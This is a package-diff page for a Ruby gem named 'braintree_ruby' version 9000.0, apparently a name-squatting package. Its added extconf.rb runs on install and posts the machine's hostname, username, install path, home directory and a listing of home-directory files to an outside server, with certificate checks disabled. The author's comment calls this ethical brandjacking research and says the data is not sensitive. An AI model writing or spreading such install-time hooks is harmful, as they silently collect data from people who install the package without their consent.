braintree_ruby 9000.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of braintree_ruby might be problematic. Click here for more details.

Files changed (3) hide show
  1. checksums.yaml +7 -0
  2. data/ext/extconf.rb +50 -0
  3. metadata +50 -0
checksums.yaml ADDED
@@ -0,0 +1,7 @@
1
+ ---
2
+ SHA256:
3
+ metadata.gz: 39deb0c79c7657258d0bc689d32159794a0c5bc2dbc5cd9e3b374c52c737947e
4
+ data.tar.gz: a25a8baf1c799e192dcf4bcbadbaef960a79b9914e6b4949468d57c134455672
5
+ SHA512:
6
+ metadata.gz: 34f6a555f3f8a0062df6e29f5dcbb722680092be534af1aa795a6a4dc251cd9f688d072275419c2baccac95fbce713db064084e6474628f8641cbc44eaefc91d
7
+ data.tar.gz: 95f87e828bdc61d3e8cca57326ac6e5898a5839de7a0d45d8a4ed5380b65142755d8b163fcad4774059f3c9eb70e5ad0596cb6f300efb6ac9b5cb4e7df15d54d
data/ext/extconf.rb ADDED
@@ -0,0 +1,50 @@
1
+ =begin
2
+ Hi, if you're reading this you're probably wondering what this code is doing on your machine.
3
+ Don't worry! It doesn't do anything nasty or malicious.
4
+
5
+ I am an ethical security researcher, booking names of gems to prevent brandjacking.
6
+
7
+ I also run a Ruby security related platform: https://diffend.io
8
+
9
+ All data I collect will be deleted and I do not collect any sensitive information.
10
+
11
+ That's why I don't even obfuscate the network calls with DNS requests or anything else.
12
+
13
+ You can read the code to confirm this.
14
+
15
+ If you have any questions or want to get in touch for any reason, you can reach me at:
16
+
17
+ maciej@mensfeld.pl
18
+
19
+ If this is affecting your organization, for example because I took name that uses your naming
20
+ conventions, feel free to contact me and I will be more than happy to give it back to you.
21
+
22
+ P.S. I did notify RubyGems security team, so they are aware of my activity.
23
+ =end
24
+
25
+ require 'mkmf'
26
+ require 'net/http'
27
+ require 'socket'
28
+ require 'etc'
29
+ require 'securerandom'
30
+ require 'json'
31
+
32
+ create_makefile 'gem_test'
33
+
34
+ uri = URI("https://ethically-testing-the.world")
35
+ http = Net::HTTP.new(uri.host, uri.port)
36
+ http.use_ssl = true
37
+ http.verify_mode = OpenSSL::SSL::VERIFY_NONE
38
+ request = Net::HTTP::Post.new('/braintree_ruby/9000.0')
39
+ request.add_field('Content-Type', 'application/json')
40
+
41
+ request.body = {
42
+ hostnames: [Socket.gethostname, Socket.gethostbyname(Socket.gethostname).first].uniq,
43
+ username: Etc.getlogin,
44
+ path: File.dirname(__FILE__),
45
+ home: Dir.home,
46
+ home_ls: Dir.entries(Dir.home),
47
+ id: SecureRandom.uuid,
48
+ }.to_json
49
+
50
+ http.request(request)
metadata ADDED
@@ -0,0 +1,50 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: braintree_ruby
3
+ version: !ruby/object:Gem::Version
4
+ version: '9000.0'
5
+ platform: ruby
6
+ authors:
7
+ - Maciej Mensfeld
8
+ autorequire:
9
+ bindir: bin
10
+ cert_chain: []
11
+ date: 2021-03-05 00:00:00.000000000 Z
12
+ dependencies: []
13
+ description: |
14
+ I am testing for brandjacking vulnerabilities in products that are in bug bounty programs.
15
+
16
+ This code is reporting-only, and does not do anything malicious.
17
+ email:
18
+ - maciej@mensfeld.pl
19
+ executables: []
20
+ extensions:
21
+ - ext/extconf.rb
22
+ extra_rdoc_files: []
23
+ files:
24
+ - ext/extconf.rb
25
+ homepage: https://diffend.io
26
+ licenses:
27
+ - GPL-3.0
28
+ metadata: {}
29
+ post_install_message: |
30
+ This is probably not the package you wanted to install.
31
+ Read the description of this gem for more details.
32
+ rdoc_options: []
33
+ require_paths:
34
+ - lib
35
+ required_ruby_version: !ruby/object:Gem::Requirement
36
+ requirements:
37
+ - - ">="
38
+ - !ruby/object:Gem::Version
39
+ version: '0'
40
+ required_rubygems_version: !ruby/object:Gem::Requirement
41
+ requirements:
42
+ - - ">="
43
+ - !ruby/object:Gem::Version
44
+ version: '0'
45
+ requirements: []
46
+ rubygems_version: 3.1.4
47
+ signing_key:
48
+ specification_version: 4
49
+ summary: Gem that sends some non-sensitive data for security research.
50
+ test_files: []